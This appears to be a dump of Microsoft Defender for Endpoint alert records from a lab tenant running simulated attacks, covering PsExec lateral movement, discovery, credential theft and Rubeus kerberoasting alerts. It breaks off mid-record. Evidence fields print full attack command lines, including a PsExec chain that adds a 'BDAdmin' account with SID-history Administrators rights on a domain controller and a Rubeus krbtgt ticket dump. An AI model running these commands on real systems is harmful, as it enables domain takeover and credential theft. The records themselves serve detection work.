} ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T06:14:52.89Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
4,064
"powershell.exe"
2022-09-30T06:11:13.210308Z
null
null
null
null
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638001152928403278_1145689599
22462113-616d-41e9-9adc-c0808f62a2cd
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:52.8403462Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:59.8745989Z
2022-09-30T06:13:28.9994915Z
Suspicious PsExec in Remote Machine
PsExec initiated a Suspicious process in a network or remote machine. Initiated process may cause more damage.
LateralMovement
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
40eca4c4-8854-418a-8024-fff7c9d7b077
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1021", "T1021.002", "T1569.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:52.89Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:52.89Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-09-30T06:11:13.210308Z", "processId": 4064, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:52.89Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:13.210308Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4064, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-dc -accepteula cmd /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-09-30T06:13:07.0509248Z", "processId": 2228, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:53.6533333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1", "processCreationTime": "2022-09-30T06:11:59.5129511Z", "processId": 9368, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:53.6533333Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:59.5129511Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 9368, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-09-30T06:12:00.7573565Z", "processId": 10400, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:05:51.15Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
11,068
"powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\jeff\Downloads'
2022-11-21T02:01:28.4753286Z
4,680
2022-11-10T07:07:26.0872385Z
explorer.exe
C:\Windows
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638001153594963653_-1610123209
ec8fe5b1-7859-4895-a3aa-164159d630f9
486
MicrosoftDefenderForEndpoint
2022-09-30T06:15:59.4963867Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:13:29.3655126Z
2022-09-30T06:13:47.8256326Z
Suspicious User Account Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1033", "T1087", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "NotSupported", "deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:27:58.906Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "defender", "domainName": "MSDXV2" }, { "accountName": "msdefender", "domainName": "MSDXV2" } ], "mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "WindowsServer2019", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e" } } ]
[ { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:15:59.5333333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:15:59.5333333Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:13:28.5321636Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 7308, "processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"", "processCreationTime": "2022-09-30T06:13:29.1932614Z", "processId": 3132, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9", "sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" }, { "aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09", "accountName": "steve", "detectionStatus": "Detected", "deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:15:59.5333333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:13:29.1932614Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 3132, "processCommandLine": "net.exe user /add BDAdmin Password1! ", "processCreationTime": "2022-09-30T06:13:29.2645969Z", "processId": 3104, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "steve@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1107", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045932698230916_1344612009
66b2987b-84bd-4e3e-a885-888fc91a459b
765
MicrosoftDefenderForEndpoint
2022-11-21T02:07:49.8231081Z
2022-11-21T02:07:53.5166667Z
null
2022-11-21T01:55:47.8840459Z
2022-11-21T02:04:42.8559403Z
Suspicious System Service Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1007", "T1059.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "internal.corp", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638072963679110202_1965280652
7b890db4-84dd-4df4-bace-1fc396a2f272
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:27.9110406Z
2022-12-22T08:59:28.49Z
null
2022-12-22T08:26:26.4888159Z
2022-12-22T08:47:53.7938146Z
Suspicious System Owner/User Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1059.001", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:27.94Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638060594559668623_1450940669
c1ca76d2-397e-428d-9edf-300936c126d4
794
MicrosoftDefenderForEndpoint
2022-12-08T01:24:15.9668895Z
2022-12-08T01:37:06.9Z
null
2022-12-08T01:12:10.8397945Z
2022-12-08T01:12:10.8397945Z
'Donoff' malware was prevented
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks. This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Malware
New
Informational
56
PartiallyRemediated
null
null
WindowsDefenderAv
d60f5b90-ecd8-4d77-8186-a801597ec762
null
null
Donoff
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Unknown", "deviceDnsName": "internal.corp", "firstSeen": "2022-12-08T01:04:21.9057174Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Medium", "tags": [], "version": "21H1", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-08T01:24:16.0866667Z", "fileName": "TestFile_OfficeChildProcess_D4F940AB-401B-4EFC-AADC-AD5F3C50688A.docm", "filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating child processes", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Prevented", "remediationStatusDetails": "Entity was pre-remediated by Windows Defender", "sha1": "7bb22f50157cf267281a81918540f4aed4e0b0e1", "sha256": "f5ec6a746f5d70212a8779e33722964c9ede5c23b3e171cd01e68b1a6c954e86", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:00.6633333Z
Suspicious
None
jeff
staging.net
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037515443422267_3570367
d4588e68-8959-4523-81e3-8fec7b5567d4
486
MicrosoftDefenderForEndpoint
2022-11-11T08:19:04.3422543Z
2022-11-19T01:35:42.7033333Z
2022-11-12T01:35:43.68Z
2022-11-11T08:17:39.4979275Z
2022-11-11T08:17:39.4979275Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T08:19:04.5766667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930704256313_1763457179
5ab5c14a-dab2-4df3-813c-d63f2d243b21
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:30.4256515Z
2022-11-21T02:36:16.63Z
null
2022-11-21T02:02:27.8997725Z
2022-11-21T02:33:42.858757Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
New
Medium
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
null
null
null
[ "T1558.003" ]
[ { "aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600", "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:29:47.252Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "steve", "domainName": "MSDXV2" } ], "mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Semi Auto Client", "riskScore": "High", "tags": [ "semi auto" ], "version": "21H1", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66" } } ]
[ { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:30.4666667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "SYSTEM", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "NT AUTHORITY", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:30.4666667Z", "fileName": "PSEXESVC.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z", "parentProcessFileName": "services.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 620, "processCommandLine": "PSEXESVC.exe", "processCreationTime": "2022-11-21T02:02:27.7361869Z", "processId": 5760, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db", "sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748", "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:30.4666667Z", "fileName": "cmd.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:02:27.7361869Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 5760, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:02:27.8509284Z", "processId": 1972, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": 